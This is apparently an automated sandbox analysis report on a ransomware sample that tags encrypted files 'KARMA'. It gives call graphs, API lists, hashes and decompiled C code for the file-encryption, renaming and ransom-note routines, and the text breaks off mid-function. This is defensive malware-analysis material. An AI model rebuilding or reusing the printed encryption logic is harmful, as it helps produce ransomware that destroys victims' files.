402b90 11 API calls 744->746 747 402a1b GetLastError 744->747 745->744 745->745 755 402c10 746->755 747->746 748 402a26 SetFilePointerEx 747->748 749 402a57 WriteFile 748->749 750 402a4d 748->750 751 402c94 GetProcessHeap RtlAllocateHeap SetFilePointerEx ReadFile 749->751 752 402a7a 749->752 750->749 796 403a60 751->796 752->751 758 402a87 752->758 754 402cf0 SetFilePointerEx WriteFile GetProcessHeap RtlFreeHeap 754->746 755->755 759 402c81 MoveFileW 755->759 756 402b8c 756->746 757 402acb GetProcessHeap HeapAlloc SetFilePointerEx ReadFile 757->758 758->746 758->756 758->757 760 402b1f SetFilePointerEx WriteFile GetProcessHeap HeapFree 758->760 759->738 760->758 762 4035e0 GetDriveTypeW GetProcessHeap HeapAlloc 761->762 763 403620 CreateThread Sleep 762->763 764 403616 762->764 763->764 798 4035a0 763->798 764->762 764->763 765 40366d 764->765 766 40368d 765->766 767 403680 WaitForSingleObject 765->767 766->687 767->766 767->767 769 402d60 768->769 769->769 770 402e31 CreateFileW 769->770 771 402e54 WriteFile FindCloseChangeNotification 770->771 772 402e86 FindFirstFileW 770->772 771->772 774 403592 772->774 779 402ea8 772->779 774->687 775 403573 FindNextFileW 776 40358b FindClose 775->776 775->779 776->774 777 4021b0 2 API calls 777->779 778 402760 49 API calls 778->779 779->775 779->777 779->778 779->779 780 402d30 51 API calls 779->780 780->779 782 402350 781->782 782->782 783 402371 GetProcessHeap HeapAlloc 782->783 784 4023a0 783->784 784->784 785 4023af CreateFontW GetDC CreateCompatibleDC SelectObject 784->785 786 402406 785->786 787 40240e 8 API calls 785->787 786->786 786->787 788 4024b5 787->788 789 4024bd DrawTextW CreateCompatibleDC CreateDIBSection SelectObject BitBlt 787->789 788->788 788->789 790 402692 ReleaseDC CreateFileW 789->790 794 4025cb 789->794 791 401ce5 ExitProcess 790->791 792 4026c9 10 API calls 790->792 792->791 793 4025e5 GetPixel 793->794 795 4025fc SetPixel SetPixel SetPixel SetPixel SetPixel 793->795 794->790 794->793 795->794 797 403a7b 796->797 797->754 799 402d30 57 API calls 798->799 800 4035c0 799->800

Callgraph

Hide Legend
  • Executed
  • Not Executed
  • Opacity -> Relevance
  • Disassembly available
callgraph 0 Function_00401240 4 Function_00401000 0->4 1 Function_004018C0 5 Function_00401480 1->5 19 Function_004015A0 1->19 2 Function_00401D00 3 Function_00402280 3->2 5->0 24 Function_004010F0 5->24 6 Function_00403780 7 Function_00403B00 8 Function_0040218A 9 Function_004035D0 17 Function_004035A0 9->17 10 Function_00403910 15 Function_00403860 10->15 11 Function_00401D10 12 Function_00402760 12->1 14 Function_004019E0 12->14 16 Function_00403A60 12->16 13 Function_00401D60 14->1 14->24 15->6 20 Function_004036A0 15->20 16->10 26 Function_00402D30 17->26 18 Function_00402320 19->0 19->5 19->24 21 Function_00401B70 21->3 21->9 21->11 21->12 21->13 21->18 22 Function_00401DF0 21->22 23 Function_00402070 21->23 25 Function_004021B0 21->25 21->26 27 Function_00401D30 21->27 24->4 26->12 26->25 26->26

Executed Functions

Download Yara Rule

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 0 402760-40279b CreateFileW 1 4027a1-4027b7 GetFileSizeEx 0->1 2 402c8d-402c93 0->2 3 4027c7-402823 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 1->3 4 4027b9 1->4 6 402825-402832 LoadLibraryW 3->6 7 402838-40283f 3->7 5 4027c0-4027c5 4->5 5->3 5->5 6->7 8 402841-40284d GetProcAddress 7->8 9 402852-4028cb 7->9 8->9 11 4028d2-4028da 9->11 12 4028dc-4028e3 11->12 13 4028ed-4028f4 11->13 12->11 14 4028e5-4028e7 12->14 15 4028f6-4028fb 13->15 16 4028fd-402900 13->16 14->13 17 402975-40298f call 4019e0 14->17 15->15 15->16 16->17 18 402902-40290c 16->18 27 402991-402996 17->27 28 402998-40299c 17->28 20 402910-402918 18->20 21 402927-40292e 20->21 22 40291a-402921 20->22 25 402930-402935 21->25 26 402937-402944 21->26 22->20 24 402923-402925 22->24 24->21 24->26 25->25 25->26 29 402963-402972 call 4018c0 26->29 30 402946-402961 26->30 27->27 27->28 31 4029b1 28->31 32 40299e 28->32 29->17 30->29 30->30 33 4029b3-4029bb 31->33 35 4029a2-4029ab 32->35 33->33 37 4029bd-4029c1 33->37 35->35 36 4029ad 35->36 36->31 39 4029c3-4029c7 37->39 40 4029de-402a15 SetFilePointerEx SetLastError WriteFile GetLastError 37->40 41 4029d0-4029dc 39->41 42 402b90-402c0a GetProcessHeap HeapFree GetProcessHeap HeapFree GetProcessHeap HeapFree GetProcessHeap HeapFree GetProcessHeap HeapFree FindCloseChangeNotification 40->42 43 402a1b-402a20 GetLastError 40->43 41->40 41->41 45 402c10-402c1d 42->45 43->42 44 402a26-402a4b SetFilePointerEx 43->44 46 402a57-402a74 WriteFile 44->46 47 402a4d 44->47 45->45 48 402c1f-402c28 45->48 50 402c94-402d2b GetProcessHeap RtlAllocateHeap SetFilePointerEx ReadFile call 403a60 SetFilePointerEx WriteFile GetProcessHeap RtlFreeHeap 46->50 51 402a7a 46->51 49 402a50-402a55 47->49 52 402c30-402c39 48->52 49->46 49->49 50->42 55 402a87-402a92 51->55 56 402a7c-402a81 51->56 52->52 53 402c3b-402c3f 52->53 57 402c40-402c4f 53->57 55->42 59 402a98 55->59 56->50 56->55 57->57 62 402c51-402c5a 57->62 60 402aa2-402aae 59->60 61 402a9a-402a9c 59->61 63 402ab0-402ab8 60->63 61->42 61->60 64 402c60-402c69 62->64 65 402b8c 63->65 66 402abe 63->66 64->64 67 402c6b-402c6f 64->67 65->42 68 402ac0-402ac5 66->68 69 402acb-402b73 GetProcessHeap HeapAlloc SetFilePointerEx ReadFile call 403a60 SetFilePointerEx WriteFile GetProcessHeap HeapFree 66->69 70 402c70-402c7f 67->70 68->65 68->69 74 402b75-402b79 69->74 75 402b7e 69->75 70->70 72 402c81-402c87 MoveFileW 70->72 72->2 74->63 75->65 76 402b80-402b86 75->76 76->63 76->65
C-Code - Quality: 86%
			E00402760(WCHAR* __ecx) {
				WCHAR* _v528;
				long _v532;
				short _v548;
				void* _v552;
				long _v556;
				union _LARGE_INTEGER* _v560;
				long _v564;
				void* _v568;
				long _v572;
				void* _v576;
				long _v580;
				void* _v584;
				intOrPtr _v588;
				union _LARGE_INTEGER* _v592;
				union _LARGE_INTEGER _v596;
				union _LARGE_INTEGER* _v600;
				void* _v604;
				void* _v612;
				void* _v616;
				int _t113;
				void* _t124;
				_Unknown_base(*)()* _t125;
				intOrPtr _t127;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t151;
				signed int _t152;
				long _t157;
				long _t159;
				void* _t161;
				void* _t171;
				void* _t173;
				intOrPtr _t185;
				struct HINSTANCE__* _t190;
				void* _t194;
				void* _t196;
				void* _t197;
				long _t199;
				struct HINSTANCE__* _t200;
				void* _t201;
				unsigned int _t202;
				void* _t204;
				void* _t205;
				signed int* _t207;
				signed short* _t208;
				signed int* _t209;
				signed short* _t210;
				signed int* _t211;
				intOrPtr* _t214;
				union _LARGE_INTEGER* _t216;
				void* _t219;
				unsigned int _t220;
				intOrPtr* _t224;
				signed int _t225;
				void* _t226;
				void* _t227;
				void* _t229;
				signed short* _t230;
				signed short* _t231;
				union _LARGE_INTEGER* _t233;
				signed int _t234;
				void* _t235;
				void* _t238;
				union _LARGE_INTEGER* _t240;
				union _LARGE_INTEGER _t241;
				unsigned int _t242;
				void* _t246;
				intOrPtr* _t247;
				WCHAR* _t249;
				union _LARGE_INTEGER _t250;
				void* _t251;
				void* _t252;
				void* _t253;
				intOrPtr _t254;
				intOrPtr _t255;
				signed int _t256;
				void* _t258;
				void* _t259;
				union _LARGE_INTEGER* _t291;
				union _LARGE_INTEGER* _t293;
				void* _t295;

				_t258 = (_t256 & 0xfffffff8) - 0x244;
				_v532 = 0;
				_v528 = __ecx;
				_t113 = CreateFileW(__ecx, 0xc0000000, 0, 0, 3, 0, 0); // executed
				_t238 = _t113;
				_v580 = _t238;
				if(_t238 != 0) {
					__imp__GetFileSizeEx(_t238,  &_v572);
					_t224 =  *0x406000;
					_t199 = 0;
					if( *_t224 != 0) {
						do {
							_t199 = _t199 + 1;
						} while ( *((char*)(_t224 + _t199)) != 0);
					}
					_v552 = HeapAlloc(GetProcessHeap(), 0, _t199);
					_v568 = HeapAlloc(GetProcessHeap(), 0, 8);
					_v564 = HeapAlloc(GetProcessHeap(), 0, 0x40);
					_t194 = HeapAlloc(GetProcessHeap(), 0, 0x40);
					_v584 = _t194;
					_t124 = HeapAlloc(GetProcessHeap(), 0, 0x20);
					_t200 =  *0x406014;
					_t246 = _t124;
					_v560 = _t246;
					if(_t200 == 0) {
						_t190 = LoadLibraryW(L"bcrypt.dll"); // executed
						_t200 = _t190;
						 *0x406014 = _t200;
					}
					_t125 =  *0x40600c;
					if(_t125 == 0) {
						_t125 = GetProcAddress(_t200, "BCryptGenRandom");
						 *0x40600c = _t125;
					}
					 *_t125(0, _t246, 0x20, 2); // executed
					 *_t194 = 0x71fd558b;
					_t11 = _t246 + 0x20; // 0x20
					_t201 = _t11;
					 *((intOrPtr*)(_t194 + 4)) = 0xf8f8eb73;
					_t127 = 0x100;
					 *((intOrPtr*)(_t194 + 8)) = 0x391f8b36;
					 *((intOrPtr*)(_t194 + 0xc)) = 0x5fef65bc;
					 *((intOrPtr*)(_t194 + 0x10)) = 0x39f1bb75;
					 *((intOrPtr*)(_t194 + 0x14)) = 0x8313bb21;
					 *((intOrPtr*)(_t194 + 0x18)) = 0xc9dfcbac;
					 *((intOrPtr*)(_t194 + 0x1c)) = 0xfa;
					 *((intOrPtr*)(_t194 + 0x20)) = 0x1f81052;
					 *((intOrPtr*)(_t194 + 0x24)) = 0x36716f7e;
					 *((intOrPtr*)(_t194 + 0x28)) = 0xf867a7ca;
					 *((intOrPtr*)(_t194 + 0x2c)) = 0xbf8a0bef;
					 *((intOrPtr*)(_t194 + 0x30)) = 0xe58528be;
					 *((intOrPtr*)(_t194 + 0x34)) = 0x3350678;
					 *((intOrPtr*)(_t194 + 0x38)) = 0x6a08a419;
					 *((intOrPtr*)(_t194 + 0x3c)) = 0x100;
					while(1) {
						_t225 =  *(_t201 - 4);
						_t201 = _t201 - 4;
						if(_t225 != 0) {
							break;
						}
						_t127 = _t127 - 0x20;
						_t255 = _t127;
						if(_t127 > 0) {
							continue;
						} else {
							if(_t255 != 0) {
								break;
							}
						}
						L24:
						E004019E0(_v576, _v580);
						_t247 =  *0x406000;
						_t226 = 0;
						_t259 = _t258 + 4;
						if( *_t247 != 0) {
							do {
								_t226 = _t226 + 1;
							} while ( *((char*)(_t247 + _t226)) != 0);
						}
						_t204 = 0;
						if(_t226 != 0) {
							_t197 = _v568;
							do {
								 *((char*)(_t204 + _t197)) =  *((intOrPtr*)(_t204 + _t247));
								_t204 = _t204 + 1;
							} while (_t204 < _t226);
							_t194 = _v600;
						}
						_t227 = 0;
						do {
							_t227 = _t227 + 1;
						} while ( *((char*)(_t227 + "11111111")) != 0);
						_t205 = 0;
						if(_t227 != 0) {
							_t252 = _v584;
							asm("o16 nop [eax+eax]");
							do {
								_t50 = _t205 + "11111111"; // 0x31313131
								 *((char*)(_t205 + _t252)) =  *_t50;
								_t205 = _t205 + 1;
							} while (_t205 < _t227);
						}
						_push(0);
						SetFilePointerEx(_t238, _v596.LowPart, _v592, 0); // executed
						SetLastError(0);
						WriteFile(_t238, _t194, 0x40,  &_v572, 0); // executed
						if(GetLastError() != 6 && GetLastError() != 0x13) {
							_push(0);
							asm("adc eax, 0x0");
							SetFilePointerEx(_t238, _v596.LowPart + 0x40, _v592, 0); // executed
							_t214 =  *0x406000;
							_t157 = 0;
							if( *_t214 != 0) {
								do {
									_t157 = _t157 + 1;
								} while ( *((char*)(_t157 + _t214)) != 0);
							}
							WriteFile(_t238, _v568, _t157,  &_v572, 0); // executed
							_t216 = _v592;
							_t159 = _v596.LowPart;
							_t291 = _t216;
							if(_t291 < 0 || _t291 <= 0 && _t159 <= 0x124f80) {
								_t161 = RtlAllocateHeap(GetProcessHeap(), 0, _t159); // executed
								_push(0);
								asm("xorps xmm0, xmm0");
								_t196 = _t161;
								asm("movlpd [esp+0x3c], xmm0");
								_t240 = _v568;
								_t250 = _v572;
								SetFilePointerEx(_v612, _t250, _t240, 0); // executed
								ReadFile(_v612, _t196, _v604,  &_v564, 0); // executed
								E00403A60(_v588, _v592, _t216, _t196, _v604);
								_push(0);
								_t238 = _v612;
								SetFilePointerEx(_t238, _t250, _t240, 0); // executed
								WriteFile(_t238, _t196, _v604,  &_v580, 0); // executed
								RtlFreeHeap(GetProcessHeap(), 0, _t196); // executed
								_t194 = _v616;
							} else {
								asm("xorps xmm0, xmm0");
								asm("movlpd [esp+0x38], xmm0");
								_t293 = _t216;
								if(_t293 >= 0 && (_t293 > 0 || _t159 != 0)) {
									_t241 = _v564;
									_v600 = _v560;
									while(1) {
										_t171 = _t159 - _t241;
										_t295 = _t171;
										asm("sbb ecx, edx");
										_v560 = _t216;
										if(_t295 < 0 || _t295 <= 0 && _t171 < 0x27100) {
											break;
										}
										_t173 = HeapAlloc(GetProcessHeap(), 0, 0x27100);
										_push(0);
										_t251 = _t173;
										SetFilePointerEx(_v604, _t241, _v600, 0); // executed
										ReadFile(_v604, _t251, 0x27100,  &_v556, 0); // executed
										E00403A60(_v580, _v584, _t216, _t251, 0x27100);
										_t259 = _t259 + 0x10;
										_push(0);
										SetFilePointerEx(_v604, _t241, _v600, 0); // executed
										WriteFile(_v604, _t251, 0x27100,  &_v572, 0); // executed
										HeapFree(GetProcessHeap(), 0, _t251);
										_t233 = _v600;
										_t241 = _t241 + 0x4e200;
										_t216 = _v592;
										asm("adc edx, 0x0");
										_v600 = _t233;
										if(_t233 >= _t216) {
											if(__eflags <= 0) {
												_t159 = _v596.LowPart;
												__eflags = _t241 - _t159;
												if(_t241 < _t159) {
													continue;
												}
											}
										} else {
											_t159 = _v596;
											continue;
										}
										break;
									}
									_t238 = _v604;
								}
							}
						}
						HeapFree(GetProcessHeap(), 0, _v568);
						HeapFree(GetProcessHeap(), 0, _v584);
						HeapFree(GetProcessHeap(), 0, _v580);
						HeapFree(GetProcessHeap(), 0, _t194);
						HeapFree(GetProcessHeap(), 0, _v576);
						FindCloseChangeNotification(_t238); // executed
						_t249 = _v552;
						_t207 =  &_v548 - 2;
						_t229 = (_t249 -  &_v548 >> 1) + 1 + (_t249 -  &_v548 >> 1) + 1;
						asm("o16 nop [eax+eax]");
						do {
							_t148 =  *(_t207 + _t229) & 0x0000ffff;
							_t207 =  &(_t207[0]);
							 *_t207 = _t148;
							__eflags = _t148;
						} while (_t148 != 0);
						_t208 =  &_v548;
						_t230 = ".";
						do {
							_t149 =  *_t208 & 0x0000ffff;
							_t208 =  &(_t208[1]);
							__eflags = _t149;
						} while (_t149 != 0);
						_t209 = _t208 - 4;
						__eflags = _t209;
						do {
							_t150 =  *_t230 & 0x0000ffff;
							_t209 =  &(_t209[0]);
							 *_t209 = _t150;
							_t94 =  &(_t230[1]); // 0x2a0000
							_t230 = _t94;
							__eflags = _t150;
						} while (_t150 != 0);
						_t210 =  &_v548;
						_t231 = L"KARMA";
						asm("o16 nop [eax+eax]");
						do {
							_t151 =  *_t210 & 0x0000ffff;
							_t210 =  &(_t210[1]);
							__eflags = _t151;
						} while (_t151 != 0);
						_t211 = _t210 - 4;
						__eflags = _t211;
						do {
							_t152 =  *_t231 & 0x0000ffff;
							_t211 =  &(_t211[0]);
							 *_t211 = _t152;
							_t231 =  &(_t231[1]);
							__eflags = _t152;
						} while (_t152 != 0);
						_t113 = MoveFileW(_t249,  &_v548); // executed
						goto L66;
					}
					_t202 = 0x80000000;
					if(_t225 >= 0) {
						do {
							_t202 = _t202 >> 1;
							_t127 = _t127 - 1;
						} while ((_t202 & _t225) == 0);
					}
					if(_t127 >= 0x74) {
						_t185 = 0x100;
						_t219 = 0x404150;
						while(1) {
							_t31 = _t219 - 4; // 0x100
							_t234 =  *_t31;
							_t32 = _t219 - 4; // 0x100
							_t219 = _t32;
							if(_t234 != 0) {
								break;
							}
							_t185 = _t185 - 0x20;
							_t254 = _t185;
							if(_t185 > 0) {
								continue;
							} else {
								if(_t254 != 0) {
									break;
								}
							}
							L21:
							_t235 = _v576;
							_t36 = _t185 - 1; // 0xfe
							_t242 = _t36;
							while(_t242 < 0x100) {
								_t253 = _t235 + (_t242 >> 5) * 4;
								_t242 = _t242 + 1;
								asm("btr eax, ecx");
							}
							_t39 = _t194 + 0x20; // 0x20
							E004018C0(_t194, _t39, _t235);
							_t238 = _v604;
							_t258 = _t258 + 4;
							goto L24;
						}
						_t220 = 0x80000000;
						if(_t234 >= 0) {
							do {
								_t220 = _t220 >> 1;
								_t185 = _t185 - 1;
							} while ((_t220 & _t234) == 0);
						}
						goto L21;
					}
					goto L24;
				}
				L66:
				return _t113;
			}





















































































0x00402766
0x0040277b
0x00402789
0x0040278d
0x00402793
0x00402795
0x0040279b
0x004027a7
0x004027ad
0x004027b3
0x004027b7
0x004027c0
0x004027c0
0x004027c1
0x004027c0
0x004027df
0x004027ec
0x004027f9
0x00402804
0x00402808
0x0040280f
0x00402815
0x0040281b
0x0040281d
0x00402823
0x0040282a
0x00402830
0x00402832
0x00402832
0x00402838
0x0040283f
0x00402847
0x0040284d
0x0040284d
0x00402859
0x0040285b
0x00402861
0x00402861
0x00402864
0x0040286b
0x00402870
0x00402877
0x0040287e
0x00402885
0x0040288c
0x00402893
0x0040289a
0x004028a1
0x004028a8
0x004028af
0x004028b6
0x004028bd
0x004028c4
0x004028cb
0x004028d2
0x004028d2
0x004028d5
0x004028da
0x00000000
0x00000000
0x004028dc
0x004028df
0x004028e3
0x00000000
0x004028e5
0x004028e7
0x00000000
0x00000000
0x004028e7
0x00402975
0x0040297d
0x00402982
0x00402988
0x0040298a
0x0040298f
0x00402991
0x00402991
0x00402992
0x00402991
0x00402998
0x0040299c
0x0040299e
0x004029a2
0x004029a5
0x004029a8
0x004029a9
0x004029ad
0x004029ad
0x004029b1
0x004029b3
0x004029b3
0x004029b4
0x004029bd
0x004029c1
0x004029c3
0x004029c7
0x004029d0
0x004029d0
0x004029d6
0x004029d9
0x004029da
0x004029d0
0x004029de
0x004029eb
0x004029f3
0x00402a04
0x00402a15
0x00402a31
0x00402a35
0x00402a3b
0x00402a41
0x00402a47
0x00402a4b
0x00402a50
0x00402a50
0x00402a51
0x00402a50
0x00402a64
0x00402a6a
0x00402a6e
0x00402a72
0x00402a74
0x00402c9e
0x00402ca4
0x00402ca6
0x00402ca9
0x00402cab
0x00402cb1
0x00402cb5
0x00402cc1
0x00402cd7
0x00402ceb
0x00402cf3
0x00402cf8
0x00402cfe
0x00402d11
0x00402d21
0x00402d27
0x00402a87
0x00402a87
0x00402a8a
0x00402a90
0x00402a92
0x00402aa6
0x00402aaa
0x00402ab0
0x00402ab0
0x00402ab0
0x00402ab2
0x00402ab4
0x00402ab8
0x00000000
0x00000000
0x00402ad9
0x00402adf
0x00402ae7
0x00402aee
0x00402b05
0x00402b1a
0x00402b1f
0x00402b22
0x00402b2f
0x00402b46
0x00402b56
0x00402b5c
0x00402b60
0x00402b66
0x00402b6a
0x00402b6d
0x00402b73
0x00402b7e
0x00402b80
0x00402b84
0x00402b86
0x00000000
0x00000000
0x00402b86
0x00402b75
0x00402b75
0x00000000
0x00402b75
0x00000000
0x00402b73
0x00402b8c
0x00402b8c
0x00402a92
0x00402a74
0x00402b9d
0x00402bb0
0x00402bc3
0x00402bd9
0x00402be8
0x00402beb
0x00402bf1
0x00402c01
0x00402c07
0x00402c0a
0x00402c10
0x00402c10
0x00402c14
0x00402c17
0x00402c1a
0x00402c1a
0x00402c1f
0x00402c23
0x00402c30
0x00402c30
0x00402c33
0x00402c36
0x00402c36
0x00402c3b
0x00402c3b
0x00402c40
0x00402c40
0x00402c43
0x00402c46
0x00402c49
0x00402c49
0x00402c4c
0x00402c4c
0x00402c51
0x00402c55
0x00402c5a
0x00402c60
0x00402c60
0x00402c63
0x00402c66
0x00402c66
0x00402c6b
0x00402c6b
0x00402c70
0x00402c70
0x00402c73
0x00402c76
0x00402c79
0x00402c7c
0x00402c7c
0x00402c87
0x00000000
0x00402c87
0x004028ed
0x004028f4
0x004028f6
0x004028f6
0x004028f8
0x004028f9
0x004028f6
0x00402900
0x00402902
0x00402907
0x00402910
0x00402910
0x00402910
0x00402913
0x00402913
0x00402918
0x00000000
0x00000000
0x0040291a
0x0040291d
0x00402921
0x00000000
0x00402923
0x00402925
0x00000000
0x00000000
0x00402925
0x00402937
0x00402937
0x0040293b
0x0040293b
0x00402944
0x00402950
0x00402953
0x00402956
0x0040295b
0x00402964
0x00402969
0x0040296e
0x00402972
0x00000000
0x00402972
0x00402927
0x0040292e
0x00402930
0x00402930
0x00402932
0x00402933
0x00402930
0x00000000
0x0040292e
0x00000000
0x00402900
0x00402c8d
0x00402c93

APIs
  • CreateFileW.KERNELBASE(?,C0000000), ref: 0040278D
  • GetFileSizeEx.KERNEL32(00000000,00000003), ref: 004027A7
  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004027D0
  • HeapAlloc.KERNEL32(00000000), ref: 004027D9
  • GetProcessHeap.KERNEL32(00000000,00000008), ref: 004027E3
  • HeapAlloc.KERNEL32(00000000), ref: 004027E6
  • GetProcessHeap.KERNEL32(00000000,00000040), ref: 004027F0
  • HeapAlloc.KERNEL32(00000000), ref: 004027F3
  • GetProcessHeap.KERNEL32(00000000,00000040), ref: 004027FD
  • HeapAlloc.KERNEL32(00000000), ref: 00402800
  • GetProcessHeap.KERNEL32(00000000,00000020), ref: 0040280C
  • HeapAlloc.KERNEL32(00000000), ref: 0040280F
  • LoadLibraryW.KERNELBASE(bcrypt.dll), ref: 0040282A
  • GetProcAddress.KERNEL32(?,BCryptGenRandom), ref: 00402847
  • SetFilePointerEx.KERNELBASE(00000000,?,?,00000000,00000000), ref: 004029EB
  • SetLastError.KERNEL32(00000000), ref: 004029F3
  • WriteFile.KERNELBASE(00000000,00000000,00000040,?,00000000), ref: 00402A04
  • GetLastError.KERNEL32 ref: 00402A10
  • GetLastError.KERNEL32 ref: 00402A1B
  • SetFilePointerEx.KERNELBASE(00000000,?,?,00000000,00000000), ref: 00402A3B
  • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00402A64
  • GetProcessHeap.KERNEL32(00000000,00027100), ref: 00402AD2
  • HeapAlloc.KERNEL32(00000000), ref: 00402AD9
  • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000), ref: 00402AEE
  • ReadFile.KERNELBASE(?,00000000,00027100,?,00000000), ref: 00402B05
  • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000), ref: 00402B2F
  • WriteFile.KERNELBASE(?,00000000,00027100,?,00000000), ref: 00402B46
  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402B4F
  • HeapFree.KERNEL32(00000000), ref: 00402B56
  • GetProcessHeap.KERNEL32(00000000,?), ref: 00402B96
  • HeapFree.KERNEL32(00000000), ref: 00402B9D
  • GetProcessHeap.KERNEL32(00000000,?), ref: 00402BA9
  • HeapFree.KERNEL32(00000000), ref: 00402BB0
  • GetProcessHeap.KERNEL32(00000000,?), ref: 00402BBC
  • HeapFree.KERNEL32(00000000), ref: 00402BC3
  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BCC
  • HeapFree.KERNEL32(00000000), ref: 00402BD9
  • GetProcessHeap.KERNEL32(00000000,?), ref: 00402BE1
  • HeapFree.KERNEL32(00000000), ref: 00402BE8
  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00402BEB
  • MoveFileW.KERNEL32(?,?), ref: 00402C87
  • GetProcessHeap.KERNEL32(00000000,?), ref: 00402C97
  • RtlAllocateHeap.NTDLL(00000000), ref: 00402C9E
  • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000), ref: 00402CC1
  • ReadFile.KERNELBASE(?,00000000,?,?,00000000), ref: 00402CD7
  • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000), ref: 00402CFE
  • WriteFile.KERNELBASE(?,00000000,?,?,00000000), ref: 00402D11
  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402D1A
  • RtlFreeHeap.NTDLL(00000000), ref: 00402D21
Strings
Memory Dump Source
  • Source File: 00000000.00000002.224986040.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.224981936.0000000000400000.00000002.00020000.sdmp Download File
  • Associated: 00000000.00000002.224990586.0000000000404000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_pss.jbxd
Similarity
  • API ID: Heap$File$Process$Free$AllocPointer$Write$ErrorLast$Read$AddressAllocateChangeCloseCreateFindLibraryLoadMoveNotificationProcSize
  • String ID: BCryptGenRandom$KARMA$PA@$bcrypt.dll$~oq6
  • API String ID: 3347413512-326148691
  • Opcode ID: a0a8443f111ba0c3258b1b3ee9450da8c50392a43b65958ef60d2d9905106ff1
  • Instruction ID: fe2765e49ddf6a15f23341d42f34b0edb02b26a7ae89cd84e9e8fe6f68251d08
  • Opcode Fuzzy Hash: a0a8443f111ba0c3258b1b3ee9450da8c50392a43b65958ef60d2d9905106ff1
  • Instruction Fuzzy Hash: 45F19CB1604301AFE7149F64CE48B2B7BA4EFC9704F14452DFB85BA2E1DBB99801CB59
Uniqueness

Uniqueness Score: -1.00%

Download Yara Rule
C-Code - Quality: 95%
			E00402D30(intOrPtr __ecx) {
				short _v524;
				char _v1044;
				short _v1564;
				struct _WIN32_FIND_DATAW _v2156;
				long _v2160;
				intOrPtr _v2168;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				void* _t221;
				int _t224;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed short _t232;
				signed int _t234;
				int _t246;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed short _t285;
				char* _t288;
				signed int _t289;
				int _t294;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				void* _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				void* _t318;
				signed short* _t319;
				signed int* _t320;
				signed int* _t322;
				signed short* _t323;
				signed int* _t324;
				signed short* _t325;
				signed int* _t326;
				signed int* _t328;
				signed short* _t329;
				signed int* _t330;
				char* _t331;
				void* _t336;
				signed int* _t414;
				signed short* _t415;
				signed int* _t416;
				signed short* _t417;
				signed int* _t418;
				signed int _t422;
				signed int _t423;
				long _t424;
				signed int* _t426;
				signed short* _t427;
				void* _t429;
				char* _t430;
				char* _t431;
				void* _t433;
				signed short* _t434;
				signed int* _t436;
				void* _t476;
				signed short* _t477;
				char* _t478;
				void* _t481;
				signed int _t482;
				void* _t483;
				intOrPtr _t485;
				void* _t487;
				void* _t488;
				void* _t489;
				void* _t490;
				void* _t491;
				char* _t492;
				void* _t493;
				void* _t494;
				void* _t495;
				void* _t496;
				void* _t497;
				void* _t498;
				void* _t499;
				void* _t500;
				void* _t501;
				void* _t502;
				void* _t503;
				void* _t504;
				void* _t505;
				void* _t506;
				void* _t508;
				long _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				void* _t531;
				signed int _t532;
				void* _t534;

				_t534 = (_t532 & 0xfffffff8) - 0x874;
				_t485 = __ecx;
				_v2168 = __ecx;
				_t426 =  &_v524 - 2;
				_t318 = (__ecx -  &_v524 >> 1) + 1 + (__ecx -  &_v524 >> 1) + 1;
				do {
					_t208 =  *(_t318 + _t426) & 0x0000ffff;
					_t426 =  &(_t426[0]);
					 *_t426 = _t208;
				} while (_t208 != 0);
				_t319 =  &_v524;
				_t427 = L"*.*";
				do {
					_t209 =  *_t319 & 0x0000ffff;
					_t319 =  &(_t319[1]);
				} while (_t209 != 0);
				_t320 = _t319 - 4;
				do {
					_t210 =  *_t427 & 0x0000ffff;
					_t320 =  &(_t320[0]);
					 *_t320 = _t210;
					_t427 =  &(_t427[1]);
				} while (_t210 != 0);
				_t322 =  &_v1564 - 2;
				_t429 = (__ecx -  &_v1564 >> 1) + 1 + (__ecx -  &_v1564 >> 1) + 1;
				do {
					_t215 =  *(_t429 + _t322) & 0x0000ffff;
					_t322 =  &(_t322[0]);
					 *_t322 = _t215;
				} while (_t215 != 0);
				_t323 =  &_v1564;
				_t430 = L"KARMA";
				do {
					_t216 =  *_t323 & 0x0000ffff;
					_t323 =  &(_t323[1]);
				} while (_t216 != 0);
				_t324 = _t323 - 4;
				do {
					_t217 =  *_t430 & 0x0000ffff;
					_t324 =  &(_t324[0]);
					 *_t324 = _t217;
					_t430 =  &(_t430[2]);
				} while (_t217 != 0);
				_t325 =  &_v1564;
				_t431 = L"-ENCRYPTED.txt";
				do {
					_t218 =  *_t325 & 0x0000ffff;
					_t325 =  &(_t325[1]);
				} while (_t218 != 0);
				_t326 = _t325 - 4;
				do {
					_t219 =  *_t431 & 0x0000ffff;
					_t326 =  &(_t326[0]);
